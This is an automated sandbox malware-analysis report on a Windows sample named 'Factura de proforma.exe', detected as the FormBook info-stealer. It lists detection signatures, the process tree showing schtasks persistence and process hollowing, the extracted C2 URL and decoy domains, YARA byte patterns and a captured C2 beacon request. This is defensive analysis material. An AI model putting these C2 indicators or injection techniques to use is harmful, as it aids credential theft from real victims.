Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Factura de proforma.exe

Overview

General Information

Sample Name:Factura de proforma.exe
Analysis ID:502357
MD5:16f7045eebb451234ca8078222c5994c
SHA1:99e8f263f9e34ad13cb8cd6af1bb816deffb5bde
SHA256:ff344e635b268090aafdb8fa830e76c41f34d7cf9a9bf03ed4ede2705008bfef
Tags:ESPexegeo
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Factura de proforma.exe (PID: 6952 cmdline: 'C:\Users\user\Desktop\Factura de proforma.exe' MD5: 16F7045EEBB451234CA8078222C5994C)
    • schtasks.exe (PID: 6436 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 6388 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 4716 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 3408 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thefanlounge.com/cb3b/"], "decoy": ["listenlocker.com", "jumpstartnotarybiz.com", "new-post-vehicle-site.xyz", "summon-entertainment.com", "johnandtracy-adopt.com", "bferety.info", "palmonlae.space", "yx1889.com", "janetnaufranck.com", "banditanalytics.com", "agenciahologram.com", "artemojo.com", "goldensuninn.com", "aminobalm.com", "customersme.com", "techcareerschool.com", "angelahuckeby.com", "smoothcontract.com", "kartsorgumerkezi.com", "houstonhemorrhoidclinic.com", "istanbuloz.com", "buyrealestatewithcarlos.com", "onlinelivehds.xyz", "outstandingearth.com", "cyclingsunglassestop.com", "haras-dors.com", "zhuanyekf.com", "pps-squad.com", "highlovely.com", "hudsonvalleymomandpopshop.com", "graytielaw.com", "orang-gilakali.com", "sajaasboutique.com", "nwomakrom.com", "mobilne-kucice.com", "instant-geek.com", "brewinginthenameof.com", "shopstel.net", "alumaber.com", "fernoost.info", "expandablepocketdeals.com", "ritelard.net", "elderyochanan.com", "gofante.online", "americansforbrazil.com", "condosofcolor.com", "the2gaku.com", "mesegeka.com", "democratsforesteban.com", "vinoporfavor.com", "xwaxxc1.com", "jinhongtextile.com", "festival-du-chanvre.com", "abrasivburada.com", "pinhoti.net", "nestd.online", "fendlercart.com", "unanox.com", "boyscout-site.com", "wlctrade.com", "gudesigns.net", "jandmisia.com", "funnyp0sts.com", "laveudelamare.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Factura de proforma.exe.2bd16b0.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          0.2.Factura de proforma.exe.3cc0560.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 8 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
            Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Factura de proforma.exe' , ParentImage: C:\Users\user\Desktop\Factura de proforma.exe, ParentProcessId: 6952, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6388
            Sigma detected: Possible Applocker BypassShow sources
            Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Factura de proforma.exe' , ParentImage: C:\Users\user\Desktop\Factura de proforma.exe, ParentProcessId: 6952, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6388

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.thefanlounge.com/cb3b/"], "decoy": ["listenlocker.com", "jumpstartnotarybiz.com", "new-post-vehicle-site.xyz", "summon-entertainment.com", "johnandtracy-adopt.com", "bferety.info", "palmonlae.space", "yx1889.com", "janetnaufranck.com", "banditanalytics.com", "agenciahologram.com", "artemojo.com", "goldensuninn.com", "aminobalm.com", "customersme.com", "techcareerschool.com", "angelahuckeby.com", "smoothcontract.com", "kartsorgumerkezi.com", "houstonhemorrhoidclinic.com", "istanbuloz.com", "buyrealestatewithcarlos.com", "onlinelivehds.xyz", "outstandingearth.com", "cyclingsunglassestop.com", "haras-dors.com", "zhuanyekf.com", "pps-squad.com", "highlovely.com", "hudsonvalleymomandpopshop.com", "graytielaw.com", "orang-gilakali.com", "sajaasboutique.com", "nwomakrom.com", "mobilne-kucice.com", "instant-geek.com", "brewinginthenameof.com", "shopstel.net", "alumaber.com", "fernoost.info", "expandablepocketdeals.com", "ritelard.net", "elderyochanan.com", "gofante.online", "americansforbrazil.com", "condosofcolor.com", "the2gaku.com", "mesegeka.com", "democratsforesteban.com", "vinoporfavor.com", "xwaxxc1.com", "jinhongtextile.com", "festival-du-chanvre.com", "abrasivburada.com", "pinhoti.net", "nestd.online", "fendlercart.com", "unanox.com", "boyscout-site.com", "wlctrade.com", "gudesigns.net", "jandmisia.com", "funnyp0sts.com", "laveudelamare.com"]}
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY
            Source: 6.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: Factura de proforma.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Factura de proforma.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp
            Source: Binary string: RegSvcs.pdb, source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, cscript.exe
            Source: Binary string: RegSvcs.pdb source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
            Source: Binary string: cscript.pdb source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi6_2_00416CEC

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.aminobalm.com
            Source: C:\Windows\explorer.exeDomain query: www.palmonlae.space
            Source: C:\Windows\explorer.exeNetwork Connect: 13.209.99.177 80Jump to behavior
            Performs DNS queries to domains with low reputationShow sources
            Source: DNS query: www.new-post-vehicle-site.xyz
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.thefanlounge.com/cb3b/
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: global trafficHTTP traffic detected: GET /cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h HTTP/1.1Host: www.aminobalm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Factura de proforma.exe, 00000000.00000003.299841120.0000000000D0D000.00000004.00000001.sdmpString found in binary or memory: http://en.w
            Source: Factura de proforma.exe, 00000000.00000003.301130424.0000000005AEB000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: Factura de proforma.exe, 00000000.00000003.307837879.0000000005ADD000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Factura de proforma.exe, 00000000.00000003.307837879.0000000005ADD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerskSHU
            Source: Factura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: Factura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com-uT
            Source: Factura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comc
            Source: Factura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comn
            Source: Factura de proforma.exe, 00000000.00000003.304081072.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Factura de proforma.exe, 00000000.00000003.304064871.0000000005B0D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn.U
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Factura de proforma.exe, 00000000.00000003.304064871.0000000005B0D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn2U%
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/7D
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/JD
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/XDiUa
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a-eoDFU$
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ko
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
            Source: Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/tDMU
            Source: Factura de proforma.exe, 00000000.00000003.300417307.0000000005AEB000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000003.303541923.0000000005AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Factura de proforma.exe, 00000000.00000003.303541923.0000000005AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krN.TTFs
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: Factura de proforma.exe, 00000000.00000003.301130424.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comF
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: cscript.exe, 0000000A.00000002.573092724.00000000051DF000.00000004.00020000.sdmpString found in binary or memory: https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkx
            Source: unknownDNS traffic detected: queries for: www.palmonlae.space
            Source: global trafficHTTP traffic detected: GET /cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h HTTP/1.1Host: www.aminobalm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Factura de proforma.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
